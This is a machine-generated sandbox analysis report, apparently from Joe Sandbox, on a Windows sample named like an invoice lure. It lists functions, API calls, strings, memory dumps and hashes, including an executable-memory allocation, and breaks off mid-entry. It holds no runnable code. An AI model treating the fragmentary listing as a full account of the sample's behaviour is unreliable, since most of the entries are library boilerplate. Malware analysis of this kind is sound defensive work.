Uniqueness Score: -1.00%

Function 00BC4D65, Relevance: 12.0, APIs: 8, Instructions: 34COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL ref: 00BC4D6B
GetSystemMetrics.USER32 ref: 00BC4D76
GetSystemMetrics.USER32 ref: 00BC4D81
GetSystemMetrics.USER32 ref: 00BC4D8F
GetDC.USER32(00000000), ref: 00BC4D9D
GetDeviceCaps.GDI32(00000000,00000058), ref: 00BC4DA8
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC4DB4
ReleaseDC.USER32 ref: 00BC4DC0

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: ef62a92b6920669c1d942ad02dcb0c0844279aa56d7e9e06c175f5b90d5cbbd3
Instruction ID: f3a27ad2004016b9d84dcc44a69a4259bfbc7cfc00a81a9e24404e9dcd586b1a
Opcode Fuzzy Hash: ef62a92b6920669c1d942ad02dcb0c0844279aa56d7e9e06c175f5b90d5cbbd3
Instruction Fuzzy Hash: 95F0F975A40B00EBEB141F71AC0DB9A7BA4FB45712F044616F21ADB290DBB584458FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CB233D, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CB2344

Part of subcall function 00BC6590: EnterCriticalSection.KERNEL32(00E48118,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65C1
Part of subcall function 00BC6590: InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65D7
Part of subcall function 00BC6590: LeaveCriticalSection.KERNEL32(00E48118,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65E5
Part of subcall function 00BC6590: EnterCriticalSection.KERNEL32(00000000,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65F2

GetProfileIntA.KERNEL32 ref: 00CB2397
GetProfileIntA.KERNEL32 ref: 00CB23AD

Strings

windows, xrefs: 00CB2391, 00CB2396, 00CB23A7
DragDelay, xrefs: 00CB23A2
DragMinDist, xrefs: 00CB238C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
String ID: DragDelay$DragMinDist$windows
API String ID: 3965097884-2101198082
Opcode ID: 110f9be0140b7898d38da48d05d6f3bec6008d1ca752d3e7013379a6655d576b
Instruction ID: 30723bb414678ff3f9cabf90d960416353577535d9d68f6ffd4b22f3e784b39c
Opcode Fuzzy Hash: 110f9be0140b7898d38da48d05d6f3bec6008d1ca752d3e7013379a6655d576b
Instruction Fuzzy Hash: 22018FB0901700CFDB60EF369945B1ABAF4BB89700F40492EF64AE7792E7B49805CF24

Uniqueness

Uniqueness Score: -1.00%

Function 00BE2213, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104,00000000,?), ref: 00BE224E
PathFindExtensionA.KERNELBASE(?), ref: 00BE2268

Strings

.CHM, xrefs: 00BE234B
.HLP, xrefs: 00BE2356, 00BE235B
.INI, xrefs: 00BE2386

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ExtensionFileFindModuleNamePath
String ID: .CHM$.HLP$.INI
API String ID: 2295281026-4017452060
Opcode ID: 0ff507896d4fffd83e3b42973b08a40b99937059423d8126383ab7702da1a353
Instruction ID: 969547cc63146e0bd897e3cb99573cfdc61d032652f5c215a291cbfc71a51f3f
Opcode Fuzzy Hash: 0ff507896d4fffd83e3b42973b08a40b99937059423d8126383ab7702da1a353
Instruction Fuzzy Hash: 5F418775900785DFDB20EB76CC46AAAB7ECEF00300F0449AAE645D7641EBB4D944CB30

Uniqueness

Uniqueness Score: -1.00%

Function 00B9D800, Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 00B9DCB0: LoadIconW.USER32 ref: 00B9DDE6

Part of subcall function 00B9DAB0: VirtualAlloc.KERNELBASE(00000000,0000B000,00003000,00000040,00000000), ref: 00B9DB1A
Part of subcall function 00B9DAB0: ExitProcess.KERNEL32 ref: 00B9DB30

Part of subcall function 00BAC0F7: __EH_prolog3_catch.LIBCMT ref: 00BAC0FE
Part of subcall function 00BAC0F7: FindResourceA.KERNEL32(?,00000000,00000005), ref: 00BAC13F
Part of subcall function 00BAC0F7: LoadResource.KERNEL32(?,00000000), ref: 00BAC147
Part of subcall function 00BAC0F7: LockResource.KERNEL32(?,00000024,00B9D854,00000000,4B5C1563), ref: 00BAC154

Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00B9D894
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00B9D89F
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00B9D8AA
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00B9D8B5
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 00B9D8C0

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ContextExternal$BaseBase::~Concurrency::details::$Resource$Load$AllocExitFindH_prolog3_catchIconLockProcessVirtual
String ID:
API String ID: 1307792249-0
Opcode ID: 820fcb20d09396f3e1db42516ee239d7ecac2b57c27f560bf10e0bda9e8c275e
Instruction ID: 2778eda4c59d5cbca875b67271210785e8345dff7356cea30caa994915c56578
Opcode Fuzzy Hash: 820fcb20d09396f3e1db42516ee239d7ecac2b57c27f560bf10e0bda9e8c275e
Instruction Fuzzy Hash: 64214C309046098FCB15EB64CC56BDDB7F8EF06310F5082E9A429A26D1EF306E08CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BE2170, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

PathFindFileNameA.SHLWAPI(00000000,?,00BE2294,?,?), ref: 00BE217C
_strlen.LIBCMT ref: 00BE2189
__cftof.LIBCMT ref: 00BE219B
SetErrorMode.KERNELBASE(00000000,?,?,00DA6811,?,?,?,?,?,?,?,?,?,00D595F0,00B90000,00000000), ref: 00BE21BB
SetErrorMode.KERNELBASE(00000000,?,00DA6811,?,?,?,?,?,?,?,?,?,00D595F0,00B90000,00000000,00000000), ref: 00BE21C7

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ErrorMode$FileFindNamePath__cftof_strlen
String ID:
API String ID: 4036641936-0
Opcode ID: 087b860951e96a08085a1e45810a6348fc7604a9cc64cd04d41dad1226ce14d4
Instruction ID: 4a94c35e40114870a8a06bc93be39b9e89ff87b3e89913c7d92f899fe123d4a3
Opcode Fuzzy Hash: 087b860951e96a08085a1e45810a6348fc7604a9cc64cd04d41dad1226ce14d4
Instruction Fuzzy Hash: 5211C270804244EFDF04BFA5D849BA93BDCEF04320F0088A9F519DB262DB71C951CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C00D28, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000000,00E48268), ref: 00C00D85
VerSetConditionMask.KERNEL32(00000000), ref: 00C00D8D
VerifyVersionInfoA.KERNEL32(0000009C,00000003,00000000), ref: 00C00D9E
GetSystemMetrics.USER32 ref: 00C00DAF

Part of subcall function 00C0162D: __EH_prolog3.LIBCMT ref: 00C01634
Part of subcall function 00C0162D: GetSysColor.USER32(00000016), ref: 00C0163D
Part of subcall function 00C0162D: GetSysColor.USER32(0000000F), ref: 00C01650
Part of subcall function 00C0162D: GetSysColor.USER32(00000015), ref: 00C01667
Part of subcall function 00C0162D: GetSysColor.USER32(0000000F), ref: 00C01673
Part of subcall function 00C0162D: GetDeviceCaps.GDI32(?,0000000C), ref: 00C0169B
Part of subcall function 00C0162D: GetSysColor.USER32(0000000F), ref: 00C016A9
Part of subcall function 00C0162D: GetSysColor.USER32(00000010), ref: 00C016B7
Part of subcall function 00C0162D: GetSysColor.USER32(00000015), ref: 00C016C5
Part of subcall function 00C0162D: GetSysColor.USER32(00000016), ref: 00C016D3
Part of subcall function 00C0162D: GetSysColor.USER32(00000014), ref: 00C016E1
Part of subcall function 00C0162D: GetSysColor.USER32(00000012), ref: 00C016EF
Part of subcall function 00C0162D: GetSysColor.USER32(00000011), ref: 00C016FD
Part of subcall function 00C0162D: GetSysColor.USER32(00000006), ref: 00C01708
Part of subcall function 00C0162D: GetSysColor.USER32(0000000D), ref: 00C01713
Part of subcall function 00C0162D: GetSysColor.USER32(0000000E), ref: 00C0171E
Part of subcall function 00C0162D: GetSysColor.USER32(00000005), ref: 00C01729
Part of subcall function 00C0162D: GetSysColor.USER32(00000008), ref: 00C01737
Part of subcall function 00C0162D: GetSysColor.USER32(00000009), ref: 00C01742
Part of subcall function 00C0162D: GetSysColor.USER32(00000007), ref: 00C0174D
Part of subcall function 00C0162D: GetSysColor.USER32(00000002), ref: 00C01758
Part of subcall function 00C0162D: GetSysColor.USER32(00000003), ref: 00C01763
Part of subcall function 00C0162D: GetSysColor.USER32(0000001B), ref: 00C01771
Part of subcall function 00C0162D: GetSysColor.USER32(0000001C), ref: 00C0177F
Part of subcall function 00C0162D: GetSysColor.USER32(0000000A), ref: 00C0178D

Part of subcall function 00C010FC: __EH_prolog3_GS.LIBCMT ref: 00C01106
Part of subcall function 00C010FC: GetDeviceCaps.GDI32(?,00000058), ref: 00C01126
Part of subcall function 00C010FC: DeleteObject.GDI32(00000000), ref: 00C01190
Part of subcall function 00C010FC: DeleteObject.GDI32(00000000), ref: 00C011AE
Part of subcall function 00C010FC: DeleteObject.GDI32(00000000), ref: 00C011CC
Part of subcall function 00C010FC: DeleteObject.GDI32(00000000), ref: 00C011EA
Part of subcall function 00C010FC: DeleteObject.GDI32(00000000), ref: 00C01208
Part of subcall function 00C010FC: DeleteObject.GDI32(00000000), ref: 00C01226
Part of subcall function 00C010FC: DeleteObject.GDI32(00000000), ref: 00C01244

Part of subcall function 00C00E0D: GetSystemMetrics.USER32 ref: 00C00E1B
Part of subcall function 00C00E0D: GetSystemMetrics.USER32 ref: 00C00E29
Part of subcall function 00C00E0D: SetRectEmpty.USER32 ref: 00C00E3C
Part of subcall function 00C00E0D: EnumDisplayMonitors.USER32(00000000,00000000,00C00CA5,00E483D4), ref: 00C00E4C
Part of subcall function 00C00E0D: SystemParametersInfoA.USER32(00000030,00000000,00E483D4,00000000), ref: 00C00E5B
Part of subcall function 00C00E0D: SystemParametersInfoA.USER32(00001002,00000000,00E483F8,00000000), ref: 00C00E88
Part of subcall function 00C00E0D: SystemParametersInfoA.USER32(00001012,00000000,00E483FC,00000000), ref: 00C00E9C
Part of subcall function 00C00E0D: SystemParametersInfoA.USER32(0000100A,00000000,00E4840C,00000000), ref: 00C00EC2

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Color$DeleteObjectSystem$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
String ID:
API String ID: 551326122-0
Opcode ID: adc4cbd898877c3ef355ff022663139037bfe1b3a2e407df5f6bab6f61cee85e
Instruction ID: 5fea5926143f6282c1788c4b7638c235a6426cb6b1c0079dae560e2eb2234a91
Opcode Fuzzy Hash: adc4cbd898877c3ef355ff022663139037bfe1b3a2e407df5f6bab6f61cee85e
Instruction Fuzzy Hash: EF1182B0A00318EFEB209F719C46FABB7ECEB85704F40445EB645E2281DA744A04CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B9DAB0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000,00003000,00000040,00000000), ref: 00B9DB1A
ExitProcess.KERNEL32 ref: 00B9DB30

Strings

., xrefs: 00B9DAEE

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AllocExitProcessVirtual
String ID: .
API String ID: 3766876677-3974621797
Opcode ID: bb55fdc3a0269e726456a7cef5d48e7809f168621fb4e6316c08d6a18423d5c5
Instruction ID: 5f8ad4174158b210d9b7d7df5586b3e3eaad6057eed2adfcabcec9eab922c750
Opcode Fuzzy Hash: bb55fdc3a0269e726456a7cef5d48e7809f168621fb4e6316c08d6a18423d5c5
Instruction Fuzzy Hash: 30112774905208EFDF10DFA5C989B9CBBF0BB01309F2445A9D601BB295D3706A84DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2B6D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BC2B74

Part of subcall function 00BC25FC: TlsAlloc.KERNEL32(?,00BC2BA0,00000004,00BB2293,00BA36A1,00BB22BC,00BAD286,00DA67F3,?,?,?,?,?,00D595F0,00B90000,00000000), ref: 00BC261B
Part of subcall function 00BC25FC: InitializeCriticalSection.KERNEL32(00E47F04,?,00BC2BA0,00000004,00BB2293,00BA36A1,00BB22BC,00BAD286,00DA67F3,?,?,?,?,?,00D595F0,00B90000), ref: 00BC262C

Strings

~, xrefs: 00BC2B87, 00BC2BA4, 00BC2BBA, 00BC2BD8
~, xrefs: 00BC2B90

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AllocCriticalH_prolog3InitializeSection
String ID: ~$~
API String ID: 2369468792-3661683218
Opcode ID: e7b69a9f95f17061c63b55d8efa31a05734ee3732a253680fbc1f54f0b184c7b
Instruction ID: ee490c8972b0ee8bfbf0ff1f8085c100f9f264d7afea5535cf49e1bc7b6d9cad
Opcode Fuzzy Hash: e7b69a9f95f17061c63b55d8efa31a05734ee3732a253680fbc1f54f0b184c7b
Instruction Fuzzy Hash: DD015A38A046128BDB14EF79C855B6D7BE1EF51351B0085ACE941DB390EF30CD0ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE21B5, Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000000,?,?,00DA6811,?,?,?,?,?,?,?,?,?,00D595F0,00B90000,00000000), ref: 00BE21BB
SetErrorMode.KERNELBASE(00000000,?,00DA6811,?,?,?,?,?,?,?,?,?,00D595F0,00B90000,00000000,00000000), ref: 00BE21C7

Part of subcall function 00BE2213: GetModuleFileNameA.KERNEL32(?,?,00000104,00000000,?), ref: 00BE224E
Part of subcall function 00BE2213: PathFindExtensionA.KERNELBASE(?), ref: 00BE2268

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ErrorMode$ExtensionFileFindModuleNamePath
String ID:
API String ID: 1764437154-0
Opcode ID: 38fb45b70cdc56297789802e38508f66e22f8d8d19f97fa37ef11bdd3bdd0564
Instruction ID: b9e2e289d4fae5a65de746f12ae32b6d6797b238f3a41b50a0564801a17e1655
Opcode Fuzzy Hash: 38fb45b70cdc56297789802e38508f66e22f8d8d19f97fa37ef11bdd3bdd0564
Instruction Fuzzy Hash: 04F0BE709103558FDB54FF66C449A997BE8EF04710F048499F509CB213CB71C802CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00BAD28A, Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00BAD29D
SetWindowsHookExA.USER32 ref: 00BAD2AD

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CurrentHookThreadWindows
String ID:
API String ID: 1904029216-0
Opcode ID: 2e46f66fefdaf2271687604cb90129f92426b5aec111d9b14c719235b06edc81
Instruction ID: 0a36d6efa7293fddc65fd5012e2e3c033030ee1072980b10228c667b0273cb0a
Opcode Fuzzy Hash: 2e46f66fefdaf2271687604cb90129f92426b5aec111d9b14c719235b06edc81
Instruction Fuzzy Hash: 02D0A731408350AFDB5067B46C09BE93FD08B02330F0447C5F821D72D1C5E4C4818B61

Uniqueness

Uniqueness Score: -1.00%

Function 00BFFB06, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BFFB0D

Part of subcall function 00C00D28: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000000,00E48268), ref: 00C00D85
Part of subcall function 00C00D28: VerSetConditionMask.KERNEL32(00000000), ref: 00C00D8D
Part of subcall function 00C00D28: VerifyVersionInfoA.KERNEL32(0000009C,00000003,00000000), ref: 00C00D9E
Part of subcall function 00C00D28: GetSystemMetrics.USER32 ref: 00C00DAF

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ConditionMask$H_prolog3InfoMetricsSystemVerifyVersion
String ID:
API String ID: 2710481357-0
Opcode ID: 8518811ed2d15d7c8e2fcfc13bace6d46a5432e9bf5b3d13f0b31c3c7d37e60f
Instruction ID: 9c90827831ef374b7b7000a4ab54aaf92d101b0deb4e9f6dfb8771a815bb2da7
Opcode Fuzzy Hash: 8518811ed2d15d7c8e2fcfc13bace6d46a5432e9bf5b3d13f0b31c3c7d37e60f
Instruction Fuzzy Hash: 1A51DEB0906F458FD3A9CF3A85517C6FAE0BF89310F108A2E91AED7361EB7061848F55

Uniqueness

Uniqueness Score: -1.00%

Function 00BAE869, Relevance: 1.6, APIs: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 00BAE88A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9a4496f6c67063ed60389512d6d555a4fc2e7e5b6281f45307fdf93d17a69ab6
Instruction ID: 6a39cbaa7a99b58fa4b8b411d95ac046fb9ce2d34001f244f3c86f5f6f55fd2a
Opcode Fuzzy Hash: 9a4496f6c67063ed60389512d6d555a4fc2e7e5b6281f45307fdf93d17a69ab6
Instruction Fuzzy Hash: 50119036704214DFDB199F69D89487E7BA5FF8A32070541AAF805C7321EB309C01CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D905E1, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D8DABB,00000001,00000364,00000007,000000FF,?,?,00D683C4,00D8DC3E,?,?,00D8AC8D), ref: 00D90622

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c7860f59dbfe7e167dd28ad3898bc3e967e90a7288510a47b7b69fadaa3680c5
Instruction ID: 2710a29e6551a60dd3435f396ab64b6d41fa92859efab8e14a752f5e4935e202
Opcode Fuzzy Hash: c7860f59dbfe7e167dd28ad3898bc3e967e90a7288510a47b7b69fadaa3680c5
Instruction Fuzzy Hash: DEF0B435244224AF9F616B2AAC05A5A3FA9EFC1760B1D4121B845D7280DF20DC2186F1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1E8B, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00BB1E92

Memory Dump Source

